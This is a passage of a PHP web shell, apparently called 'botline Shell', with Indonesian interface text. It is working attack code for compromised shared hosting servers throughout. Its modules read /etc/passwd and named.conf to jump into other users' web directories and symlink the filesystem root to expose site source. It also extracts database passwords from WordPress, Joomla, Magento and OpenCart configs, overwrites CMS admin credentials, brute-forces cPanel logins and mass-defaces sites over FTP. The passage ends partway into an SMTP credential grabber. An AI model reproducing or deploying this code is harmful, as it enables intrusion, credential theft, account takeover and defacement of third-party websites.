780.                             $jrw = "[<font color=white>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
781.                             if(is_writable($url_user)) {
782.                                 $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
783.                             }
784.                             echo $jrw."<br>";
785.                         }
786.                     }
787.                 }
788.             }
789.         if($i == 0) {
790.         } else {
791.             echo "<br>Total ada ".$i." Lonte di ".$ip;
792.         }
793.         echo "</pre>";
794.         } else {
795.             echo '<center>
796.                   <form method="post">
797.                   Daftar Domains: <br>
798.                   <textarea name="url" style="width: 500px; height: 250px;">';
799.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
800.             while($getss = fgets($fp)) {
801.                 echo $getss;
802.             }
803.             echo  '</textarea><br>
804.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
805.                   </form></center>';
806.         }
807.     } elseif(preg_match("/vhosts|vhost/", $dir)) {
808.         preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
809.         $urls = explode("\r\n", $_POST['url']);
810.         if(isset($_POST['jump'])) {
811.             echo "<pre>";
812.             foreach($urls as $url) {
813.                 $url = str_replace("www.", "", $url);
814.                 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
815.                 if(is_dir($web_vh) === true) {
816.                     if(is_readable($web_vh)) {
817.                         $i++;
818.                         $jrw = "[<font color=white>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
819.                         if(is_writable($web_vh)) {
820.                             $jrw = "[<font color=white>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
821.                         }
822.                         echo $jrw."<br>";
823.                     }
824.                 }
825.             }
826.         if($i == 0) {
827.         } else {
828.             echo "<br>Total ada ".$i." Kamar di ".$ip;
829.         }
830.         echo "</pre>";
831.         } else {
832.             echo '<center>
833.                   <form method="post">
834.                   List Domains: <br>
835.                   <textarea name="url" style="width: 500px; height: 250px;">';
836.                   bing("ip:$ip");
837.             echo  '</textarea><br>
838.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
839.                   </form></center>';
840.         }
841.     } else {
842.         echo "<pre>";
843.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
844.         while($passwd = fgets($etc)) {
845.             if($passwd == '' || !$etc) {
846.                 echo "<font color=red>Can't read /etc/passwd</font>";
847.             } else {
848.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
849.                 foreach($user_jumping[1] as $user_idx_jump) {
850.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
851.                     if(is_readable($user_jumping_dir)) {
852.                         $i++;
853.                         $jrw = "[<font color=white>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
854.                         if(is_writable($user_jumping_dir)) {
855.                             $jrw = "[<font color=white>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
856.                         }
857.                         echo $jrw;
858.                         if(function_exists('posix_getpwuid')) {
859.                             $domain_jump = file_get_contents("/etc/named.conf");   
860.                             if($domain_jump == '') {
861.                                 echo " => ( <font color=red>Yah...Gagal Ambil Domainnya</font> )<br>";
862.                             } else {
863.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
864.                                 foreach($domains_jump[1] as $dj) {
865.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
866.                                     $user_jumping_url = $user_jumping_url['name'];
867.                                     if($user_jumping_url == $user_idx_jump) {
868.                                         echo " => ( <u>$dj</u> )<br>";
869.                                         break;
870.                                     }
871.                                 }
872.                             }
873.                         } else {
874.                             echo "<br>";
875.                         }
876.                     }
877.                 }
878.             }
879.         }
880.         if($i == 0) {
881.         } else {
882.             echo "<br>Total ada ".$i." Lonte di ".$ip;
883.         }
884.         echo "</pre>";
885.     }
886.     echo "</div>";
887. } elseif($_GET['do'] == 'symlink') {
888. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
889. $d0mains = @file("/etc/named.conf");
890. ##httaces
891. if($d0mains){
892. @mkdir("botline_Symlink",0777);
893. @chdir("botline_Symlink");
894. @exe("ln -s / root");
895. $file3 = 'Options Indexes FollowSymLinks
896. DirectoryIndex 0xaN0n.htm
897. AddType text/plain .php
898. AddHandler text/plain .php
899. Satisfy Any';
900. $fp3 = fopen('.htaccess','w');
901. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
902. echo "
903. <table align=center border=1 style='width:60%;border-color:#33FF00;'>
904. <tr>
905. <td align=center><font size=2>S. No.</font></td>
906. <td align=center><font size=2>Domains</font></td>
907. <td align=center><font size=2>Users</font></td>
908. <td align=center><font size=2>Symlink</font></td>
909. </tr>";
910. $dcount = 1;
911. foreach($d0mains as $d0main){
912. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
913. flush();
914. if(strlen(trim($domains[1][0])) > 2){
915. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
916. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
917. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
918. <td>".$user['name']."</td>
919. <td><a href='$full/botline_Symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
920. flush();
921. $dcount++;}}}
922. echo "</table>";
923. }else{
924. $TEST=@file('/etc/passwd');
925. if ($TEST){
926. @mkdir("botline_Symlink",0777);
927. @chdir("botline_Symlink");
928. exe("ln -s / root");
929. $file3 = 'Options Indexes FollowSymLinks
930. DirectoryIndex 0xaN0n.htm
931. AddType text/plain .php
932. AddHandler text/plain .php
933. Satisfy Any';
934.  $fp3 = fopen('.htaccess','w');
935.  $fw3 = fwrite($fp3,$file3);
936.  @fclose($fp3);
937.  echo "
938. <table align=center border=1><tr>
939. <td align=center><font size=3>S. No.</font></td>
940. <td align=center><font size=3>Users</font></td>
941. <td align=center><font size=3>Symlink</font></td></tr>";
942.  $dcount = 1;
943.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
944.  while(!feof($file)){
945.  $s = fgets($file);
946.  $matches = array();
947.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
948.  $matches = str_replace("home/","",$matches[1]);
949.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
950.  continue;
951.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
952. <td align=center><font class=txt>" . $matches . "</td>";
953.  echo "<td align=center><font class=txt><a href=$full/botline_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
954.  $dcount++;}fclose($file);
955.  echo "</table>";}else{if($os != "Windows"){@mkdir("botline_Symlink",0777);@chdir("botline_Symlink");@exe("ln -s / root");$file3 = '
956. Options Indexes FollowSymLinks
957. DirectoryIndex 0xaN0n.htm
958. AddType text/plain .php
959. AddHandler text/plain .php
960. Satisfy Any
961. ';
962.  $fp3 = fopen('.htaccess','w');
963.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
964.  echo "
965. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
966. <table align=center border=1><tr>
967. <td align=center><font size=3>ID</font></td>
968. <td align=center><font size=3>Users</font></td>
969. <td align=center><font size=3>Symlink</font></td></tr>";
970.  $temp = "";$val1 = 0;$val2 = 1000;
971.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
972.  if ($uid)$temp .= join(':',$uid)."\n";}
973.  echo '<br/>';$temp = trim($temp);$file5 =
974.  fopen("test.txt","w");
975.  fputs($file5,$temp);
976.  fclose($file5);$dcount = 1;$file =
977.  fopen("test.txt", "r") or exit("Unable to open file!");
978.  while(!feof($file)){$s = fgets($file);$matches = array();
979.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
980.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
981.  continue;
982.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
983. <td align=center><font class=txt>" . $matches . "</td>";
984.  echo "<td align=center><font class=txt><a href=$full/botline_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
985.  $dcount++;}
986.  fclose($file);
987.  echo "</table></div></center>";unlink("test.txt");
988.  } else
989.  echo "<center><font size=3>Cannot create Symlink</font></center>";
990.  }
991.  }    
992. } elseif($_GET['do'] == 'auto_edit_user') {
993.     if($_POST['hajar']) {
994.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
995.             echo "username atau password harus lebih dari 6 karakter";
996.         } else {
997.             $user_baru = $_POST['user_baru'];
998.             $pass_baru = md5($_POST['pass_baru']);
999.             $conf = $_POST['config_dir'];
1000.             $scan_conf = scandir($conf);
1001.             foreach($scan_conf as $file_conf) {
1002.                 if(!is_file("$conf/$file_conf")) continue;
1003.                 $config = file_get_contents("$conf/$file_conf");
1004.                 if(preg_match("/JConfig|joomla/",$config)) {
1005.                     $dbhost = ambilkata($config,"host = '","'");
1006.                     $dbuser = ambilkata($config,"user = '","'");
1007.                     $dbpass = ambilkata($config,"password = '","'");
1008.                     $dbname = ambilkata($config,"db = '","'");
1009.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
1010.                     $prefix = $dbprefix."users";
1011.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1012.                     $db = mysql_select_db($dbname);
1013.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1014.                     $result = mysql_fetch_array($q);
1015.                     $id = $result['id'];
1016.                     $site = ambilkata($config,"sitename = '","'");
1017.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1018.                     echo "Config => ".$file_conf."<br>";
1019.                     echo "CMS => Joomla Kuy<br>";
1020.                     if($site == '') {
1021.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1022.                     } else {
1023.                         echo "Sitename => $site<br>";
1024.                     }
1025.                     if(!$update OR !$conn OR !$db) {
1026.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1027.                     } else {
1028.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1029.                     }
1030.                     mysql_close($conn);
1031.                 } elseif(preg_match("/WordPress/",$config)) {
1032.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
1033.                     $dbuser = ambilkata($config,"DB_USER', '","'");
1034.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1035.                     $dbname = ambilkata($config,"DB_NAME', '","'");
1036.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
1037.                     $prefix = $dbprefix."users";
1038.                     $option = $dbprefix."options";
1039.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1040.                     $db = mysql_select_db($dbname);
1041.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1042.                     $result = mysql_fetch_array($q);
1043.                     $id = $result[ID];
1044.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1045.                     $result2 = mysql_fetch_array($q2);
1046.                     $target = $result2[option_value];
1047.                     if($target == '') {
1048.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1049.                     } else {
1050.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1051.                     }
1052.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1053.                     echo "Config => ".$file_conf."<br>";
1054.                     echo "CMS => Wordpress Kuy<br>";
1055.                     echo $url_target;
1056.                     if(!$update OR !$conn OR !$db) {
1057.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1058.                     } else {
1059.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1060.                     }
1061.                     mysql_close($conn);
1062.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1063.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1064.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1065.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1066.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1067.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1068.                     $prefix = $dbprefix."admin_user";
1069.                     $option = $dbprefix."core_config_data";
1070.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1071.                     $db = mysql_select_db($dbname);
1072.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1073.                     $result = mysql_fetch_array($q);
1074.                     $id = $result[user_id];
1075.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1076.                     $result2 = mysql_fetch_array($q2);
1077.                     $target = $result2[value];
1078.                     if($target == '') {
1079.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1080.                     } else {
1081.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1082.                     }
1083.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1084.                     echo "Config => ".$file_conf."<br>";
1085.                     echo "CMS => Magento Kuy<br>";
1086.                     echo $url_target;
1087.                     if(!$update OR !$conn OR !$db) {
1088.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1089.                     } else {
1090.                         echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1091.                     }
1092.                     mysql_close($conn);
1093.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1094.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1095.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1096.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1097.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1098.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1099.                     $prefix = $dbprefix."user";
1100.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1101.                     $db = mysql_select_db($dbname);
1102.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1103.                     $result = mysql_fetch_array($q);
1104.                     $id = $result[user_id];
1105.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
1106.                     if($target == '') {
1107.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1108.                     } else {
1109.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1110.                     }
1111.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1112.                     echo "Config => ".$file_conf."<br>";
1113.                     echo "CMS => OpenCart Kuy<br>";
1114.                     echo $url_target;
1115.                     if(!$update OR !$conn OR !$db) {
1116.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1117.                     } else {
1118.                         echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1119.                     }
1120.                     mysql_close($conn);
1121.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1122.                     $dbhost = ambilkata($config,'server = "','"');
1123.                     $dbuser = ambilkata($config,'username = "','"');
1124.                     $dbpass = ambilkata($config,'password = "','"');
1125.                     $dbname = ambilkata($config,'database = "','"');
1126.                     $prefix = "users";
1127.                     $option = "identitas";
1128.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1129.                     $db = mysql_select_db($dbname);
1130.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1131.                     $result = mysql_fetch_array($q);
1132.                     $target = $result[alamat_website];
1133.                     if($target == '') {
1134.                         $target2 = $result[url];
1135.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1136.                         if($target2 == '') {
1137.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1138.                         } else {
1139.                             $cek_login3 = file_get_contents("$target2/adminweb/");
1140.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1141.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1142.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1143.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1144.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1145.                             } else {
1146.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1147.                             }
1148.                         }
1149.                     } else {
1150.                         $cek_login = file_get_contents("$target/adminweb/");
1151.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1152.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1153.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1154.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1155.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1156.                         } else {
1157.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1158.                         }
1159.                     }
1160.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1161.                     echo "Config => ".$file_conf."<br>";
1162.                     echo "CMS => Lokomedia Njai<br>";
1163.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1164.                         echo $url_target2;
1165.                     } else {
1166.                         echo $url_target;
1167.                     }
1168.                     if(!$update OR !$conn OR !$db) {
1169.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1170.                     } else {
1171.                         echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1172.                     }
1173.                     mysql_close($conn);
1174.                 }
1175.             }
1176.         }
1177.     } else {
1178.         echo "<center>
1179.         <h1>Auto Edit User Config</h1>
1180.         <form method='post'>
1181.         DIR Config: <br>
1182.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1183.         Set User & Pass: <br>
1184.         <input type='text' name='user_baru' value='botline' placeholder='user_baru'><br>
1185.         <input type='text' name='pass_baru' value='botline' placeholder='pass_baru'><br>
1186.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1187.         </form>
1188.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1189.         ";
1190.     }
1191. } elseif($_GET['do'] == 'cpanel') {
1192.     if($_POST['crack']) {
1193.         $usercp = explode("\r\n", $_POST['user_cp']);
1194.         $passcp = explode("\r\n", $_POST['pass_cp']);
1195.         $i = 0;
1196.         foreach($usercp as $ucp) {
1197.             foreach($passcp as $pcp) {
1198.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1199.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1200.                     } else {
1201.                         $_SESSION[$ucp] = "1";
1202.                         $_SESSION[$pcp] = "1";
1203.                         if($ucp == '' || $pcp == '') {
1204.                            
1205.                         } else {
1206.                             $i++;
1207.                             if(function_exists('posix_getpwuid')) {
1208.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
1209.                                 if($domain_cp == '') {
1210.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
1211.                                 } else {
1212.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1213.                                     foreach($domains_cp[1] as $dj) {
1214.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1215.                                         $user_cp_url = $user_cp_url['name'];
1216.                                         if($user_cp_url == $ucp) {
1217.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=white>$dj</font></a>";
1218.                                             break;
1219.                                         }
1220.                                     }
1221.                                 }
1222.                             } else {
1223.                                 $dom = "<font color=red>function is Disable by system</font>";
1224.                             }
1225.                             echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>) domain ($dom)<br>";
1226.                         }
1227.                     }
1228.                 }
1229.             }
1230.         }
1231.         if($i == 0) {
1232.         } else {
1233.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=red>botline Shell.</font>";
1234.         }
1235.     } else {
1236.         echo "<center>
1237.         <form method='post'>
1238.         USER: <br>
1239.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1240.         $_usercp = fopen("/etc/passwd","r");
1241.         while($getu = fgets($_usercp)) {
1242.             if($getu == '' || !$_usercp) {
1243.                 echo "<font color=red>Can't read /etc/passwd</font>";
1244.             } else {
1245.                 preg_match_all("/(.*?):x:/", $getu, $u);
1246.                 foreach($u[1] as $user_cp) {
1247.                         if(is_dir("/home/$user_cp/public_html")) {
1248.                             echo "$user_cp\n";
1249.                     }
1250.                 }
1251.             }
1252.         }
1253.         echo "</textarea><br>
1254.         PASS: <br>
1255.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1256.         function cp_pass($dir) {
1257.             $pass = "";
1258.             $dira = scandir($dir);
1259.             foreach($dira as $dirb) {
1260.                 if(!is_file("$dir/$dirb")) continue;
1261.                 $ambil = file_get_contents("$dir/$dirb");
1262.                 if(preg_match("/WordPress/", $ambil)) {
1263.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1264.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1265.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1266.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1267.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1268.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1269.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1270.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1271.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1272.                 } elseif(preg_match("/^[client]$/", $ambil)) {
1273.                     preg_match("/password=(.*?)/", $ambil, $pass1);
1274.                     if(preg_match('/"/', $pass1[1])) {
1275.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1276.                         $pass .= $pass1[1]."\n";
1277.                     } else {
1278.                         $pass .= $pass1[1]."\n";
1279.                     }
1280.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1281.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1282.                 }
1283.             }
1284.             echo $pass;
1285.         }
1286.         $cp_pass = cp_pass($dir);
1287.         echo $cp_pass;
1288.         echo "</textarea><br>
1289.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1290.         </form>
1291.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1292.     }
1293. } elseif($_GET['do'] == 'cpftp_auto') {
1294.     if($_POST['crack']) {
1295.         $usercp = explode("\r\n", $_POST['user_cp']);
1296.         $passcp = explode("\r\n", $_POST['pass_cp']);
1297.         $i = 0;
1298.         foreach($usercp as $ucp) {
1299.             foreach($passcp as $pcp) {
1300.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1301.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1302.                     } else {
1303.                         $_SESSION[$ucp] = "1";
1304.                         $_SESSION[$pcp] = "1";
1305.                         if($ucp == '' || $pcp == '') {
1306.                             //
1307.                         } else {
1308.                             echo "[+] username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
1309.                             $ftp_conn = ftp_connect($ip);
1310.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1311.                             if((!$ftp_login) || (!$ftp_conn)) {
1312.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
1313.                             } else {
1314.                                 echo "[+] <font color=white>Login Sukses</font><br>";
1315.                                 $fi = htmlspecialchars($_POST['file_deface']);
1316.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1317.                                 if($deface) {
1318.                                     $i++;
1319.                                     echo "[+] <font color=white>Deface Sukses</font><br>";
1320.                                     if(function_exists('posix_getpwuid')) {
1321.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
1322.                                         if($domain_cp == '') {
1323.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1324.                                         } else {
1325.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1326.                                             foreach($domains_cp[1] as $dj) {
1327.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1328.                                                 $user_cp_url = $user_cp_url['name'];
1329.                                                 if($user_cp_url == $ucp) {
1330.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1331.                                                     break;
1332.                                                 }
1333.                                             }
1334.                                         }
1335.                                     } else {
1336.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1337.                                     }
1338.                                 } else {
1339.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
1340.                                 }
1341.                             }
1342.                             //echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
1343.                         }
1344.                     }
1345.                 }
1346.             }
1347.         }
1348.         if($i == 0) {
1349.         } else {
1350.             echo "<br>sukses deface ".$i." Cpanel by <font color=white>botline Shell</font>";
1351.         }
1352.     } else {
1353.         echo "<center>
1354.         <form method='post'>
1355.         Filename: <br>
1356.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1357.         Deface Page: <br>
1358.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1359.         USER: <br>
1360.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1361.         $_usercp = fopen("/etc/passwd","r");
1362.         while($getu = fgets($_usercp)) {
1363.             if($getu == '' || !$_usercp) {
1364.                 echo "<font color=red>Can't read /etc/passwd</font>";
1365.             } else {
1366.                 preg_match_all("/(.*?):x:/", $getu, $u);
1367.                 foreach($u[1] as $user_cp) {
1368.                         if(is_dir("/home/$user_cp/public_html")) {
1369.                             echo "$user_cp\n";
1370.                     }
1371.                 }
1372.             }
1373.         }
1374.         echo "</textarea><br>
1375.         PASS: <br>
1376.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1377.         function cp_pass($dir) {
1378.             $pass = "";
1379.             $dira = scandir($dir);
1380.             foreach($dira as $dirb) {
1381.                 if(!is_file("$dir/$dirb")) continue;
1382.                 $ambil = file_get_contents("$dir/$dirb");
1383.                 if(preg_match("/WordPress/", $ambil)) {
1384.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1385.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1386.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1387.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1388.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1389.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1390.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1391.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1392.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1393.                 } elseif(preg_match("/client/", $ambil)) {
1394.                     preg_match("/password=(.*)/", $ambil, $pass1);
1395.                     if(preg_match('/"/', $pass1[1])) {
1396.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1397.                         $pass .= $pass1[1]."\n";
1398.                     }
1399.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1400.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1401.                 }
1402.             }
1403.             echo $pass;
1404.         }
1405.         $cp_pass = cp_pass($dir);
1406.         echo $cp_pass;
1407.         echo "</textarea><br>
1408.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1409.         </form>
1410.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1411.     }
1412. } elseif($_GET['do'] == 'smtp') {
1413.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1414.     function scj($dir) {
1415.         $dira = scandir($dir);
1416.         foreach($dira as $dirb) {
1417.             if(!is_file("$dir/$dirb")) continue;
1418.             $ambil = file_get_contents("$dir/$dirb");
1419.             $ambil = str_replace("$", "", $ambil);
1420.             if(preg_match("/JConfig|joomla/", $ambil)) {
